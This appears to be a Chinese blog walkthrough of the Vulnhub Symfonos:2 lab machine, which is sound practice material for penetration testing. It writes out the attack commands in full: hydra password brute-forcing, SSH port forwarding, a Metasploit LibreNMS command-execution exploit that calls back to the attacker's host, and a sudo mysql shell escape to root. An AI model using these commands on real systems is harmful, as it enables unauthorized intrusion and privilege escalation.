【Vulnhub靶机】Symfonos:2

已于 2024-07-04 23:54:02 修改
阅读量400 收藏 9
点赞数 4
分类专栏: 【靶机】Vulnhub Walkthrough 文章标签: linux 网络安全 web安全
于 2024-06-27 11:41:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zzzylty/article/details/140009384
版权

信息收集

主机发现

kali ip:192.168.233.128
靶机ip:192.168.233.141
image.png

端口扫描

nmap -Pn -sV -p- -A 192.168.233.141

靶机开放了21 22 80 139 445端口
image.png
访问80端口,发现只有图片

在这里插入图片描述

目录爆破

并没发现了有用的东西
image.png
查看共享文件夹

smbclient -L 192.168.233.141

发现anonymous共享文件夹
image.png
查看anonymous 文件夹

smbclient //192.168.233.141/anonymous

image.png
发现一个log.txt 文件,下载下来看一下

get log.txt
cat log.txt

发现了一个叫aeolus 的用户image.png
image.png
知道用户名之后, 可也尝试使用hydra 进行密码爆破

hydra -l aeolus -U /usr/share/wordlists/rockyou.txt ftp://192.168.233.141

爆破成功!拿到了账密:aeolus \ sergioteamo
使用爆破出来的账密进行ssh 登录
ssh aeolus@192.168.233.141
登录成功!
image.png
使用SSH登录的情况下会对很多命令有限制
image.png
知道了账号密码,那就使用msf 工具进行SSH登录启动metasploit 工具
msfconsole
查找ssh 登录模块

search ssh_login

image.png
使用第一个
use 0
查看一下需要设置那些选项
show optionsimage.png
image.png

sessions 将sessions 会话升级为一个meterpreter会话 查看sessions 会话
sessions -u 1 升级会话  使用第二个会话

image.png
查看网络相关信息
netstat
发现8080端口只允许靶机本身连接
image.png

端口转发

将本地的9999端口映射到靶机的8080端口

ssh -Nf -L 8888:127.0.0.1:8080 aeolus@192.168.233.141

ssh: 调用SSH客户端。
-N: 不执行远程命令,仅用于端口转发。
-f: 在后台运行SSH客户端。
-L 8888:127.0.0.1:8080: 本地端口转发,格式为 local_port:remote_address:remote_port。将本地的 8888 端口转发到远程主机的 127.0.0.1:8080。
aeolus@192.168.233.141: 连接到远程主机 192.168.233.141 上的用户 aeolus。

将本地机器的8888端口映射到远程机器的127.0.0.1的8080端口 执行此命令后,本地机器的8888端口将被转发到远程机器的8080端口。你可以通过在本地浏览器中访问http://localhost:8888来访问远程机器上的服务。
image.png
image.png
发现网站使用的是libreNMS 系统
使用msf 查看一下该系统是否存在漏洞

search libreNMS

image.png

发现两个命令执行漏洞
使用第一个
use 1
show options 查看一下需要设置的选项

image.png

set PASSWORD sergioteamo
set RHOSTS 127.0.0.1
set RPORT 8888
set USERNAME aeolus
set LHOST 192.168.233.128
run

利用成功!切换到Shell 模式
python -c “import pty;pty.spawn(‘/bin/bash’)”
image.png

提权

查看一下可以执行哪些特殊权限命令
sudo -limage.png
发现可以用root 权限执行mysql
mysql 提权

sudo mysql -e '\! /bin/sh'

image.png
成功提权

Zer0sec
关注
专栏目录
Vulnhub-symfonos: 1
Demonering的博客
09-10 1415
摘要: 渗透大致流程: 通过Kali攻击机nmap扫描IP 扫描开放端口号并查看对应服务 通过发现的SMB服务使用enum4linux查看共享文件夹名和用户名,以及使用smbclient枚举查看 通过匿名用户anonymous发现用户helios的登陆密码 登录helios后发现提示目录文件 访问该网页发现为wordpress的网站 利用wpscan扫描发现两个漏洞插件 使用searchsploit查找对应漏洞payload(利用本地文件包含漏洞) 利用本地文件包含/var/mail/h
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub symfonos: 3.1
箭雨镜屋
04-14 1173
渗透思路:nmap扫描----gobuster扫描网站目录----shellshock获得反弹shell----pspy发现定时ftp连接----tcpdump获取用户密码----vi修改python脚本获得root权限反弹shell
Vulnhub靶场之symfonos: 6.1
SoporAeternus12的博客
05-01 1671
靶场地址: 点我. 信息收集 nmap -sP 192.168.157.148/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-01 01:20 EDT Nmap scan report for 192.168.157.2 Host is up (0.00080s latency). Nmap scan report for 192.168.157.158 Host is up (0.00028s latency). Nmap scan repor
Vulnhub靶场之symfonos:1
SoporAeternus12的博客
04-16 3417
靶场的下载地址: 信息收集 nmap -sP 192.168.157.145/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 09:45 EDT Nmap scan report for 192.168.157.2 Host is up (0.00055s latency). Nmap scan report for 192.168.157.158 Host is up (0.00016s latency). Nmap scan repor
vulnhub靶场,SYMFONOS: 1
kukudeshuo的博客
09-03 917
vulnhub靶场,SYMFONOS: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/symfonos-1,322/ 攻击机:kali(192.168.109.128) 靶机SYMFONOS: 1(192.168.109.174) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.174 使用nmap扫描查看目
Vulnhub靶机 Symfonos 2
菜浪马废的博客
09-25 422
扫出用户名aeolus aeolus:sergioteamo 用来登录ssh试试 转发8080端口 提权成功 先是enum4linux找到用户名 ftp爆破 发现可以用来登录ssh 找到运行的8080端口 ssh端口转发 访问后发现是cms 找到漏洞 得到下一个用户权限 sudo -l找到mysql gtfobins上找到提权方法 得到root权限 ...
Vulnhub - Symfonos
qq_46081990的博客
03-17 1254
发现attention.txt,将其下载到本地并查看,其内容为Zeus叫员工停止使用'epidioko', 'qwerty', 'baseball'这三个密码,被他发现就要炒鱿鱼了,那看来Zeus应该是个老板哈哈哈。其中Sharename为共享文件夹的名称:print$为打印机驱动程序的共享文件夹,helios为用户helios个人共享文件夹,anonymous为匿名共享文件夹,IPC$为IPC服务的共享文件夹。访问以下路径发现刚才的邮件已经写进去了,这里没有webshell代码是正常的,说明被执行了。
VulnHub系列』symfonos: 3-Walkthrough
ins1ght的博客
10-16 1048
靶机发布日期:2019年7月20日。经过了曲折的页面、目录枚举,发现shellshock漏洞,随后使用MSF获取到了shell。提权过程中先后使用手工、脚本对信息进行收集,最后使用pspy发现了root权限运行的ftpclient.py脚本。tcpdump嗅探到ftp服务的用户名、密码,随后登录SSH,修改ftpclient.py脚本获得root权限。
Vulnhub靶机 Symfonos 3
菜浪马废的博客
09-26 453
有shellshock漏洞 验证一下 上传pspy32扫到的进程 下载文件 wireshark进行分析 得到账号密码 登录成功 修改脚本 等待一会得到root权限
Linux 性能优化之CPU 多级缓存
山河已无恙
09-30 892
博文内容为 Linux CPU 多级缓存认知内容涉及:什么是CPU多级缓存认知,CPU 硬件缓存信息,缓存流程写入策略,映射算法认知CPU 缓存分析,使用 valgring 和 Perf 分析CPU 缓存命中情况编码方面 CPU 缓存优化,数据指令缓存,多核缓存命中率优化方式理解不足小伙伴帮忙指正 😃,生活加油哦99%的焦虑都来自于虚度时间和没有好好做事,所以唯一的解决办法就是行动起来,认真做完事情,战胜焦虑,战胜那些心里空荡荡的时刻,而不是选择逃避。
Linux 再入门整理:详解 /etc/fstab 文件
最新发布
一只奋斗的猪
10-01 1198
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
linux 网络序
CodeHouse的博客
09-30 469
在将ip字符串转网络序存储时。根据整形二进制显示判断。
在 Kali Linux 中安装 Impacket
weixin_44023460的博客
09-30 349
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket。
Linux的基本指令(2)
shylyly_的博客
10-01 997
Linux的基本指令(2) man nano cp mv which 自制指令 alias echo cat tac > >> < more less head tail |(管道)
使用Python实现在 Linux 和 Windows 之间的双向文件传输
2301_80892630的博客
09-29 717
Linux 和 Windows 之间可以用python程序实现双向文件传输,通过创建一个简单的文件传输程序来实现。该程序将使用套接字socket通信,允许任意一端发送或接收文件。这是在我的那篇实现python两个进程之间相互通信的基础上拓展的(不过只看这一篇文章也行),那篇文章传输的数据是字符串类型,今天我来实现文件的传输。
Linux下send函数和recv函数
威桑的博客
10-01 428
Linux下send和recv
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值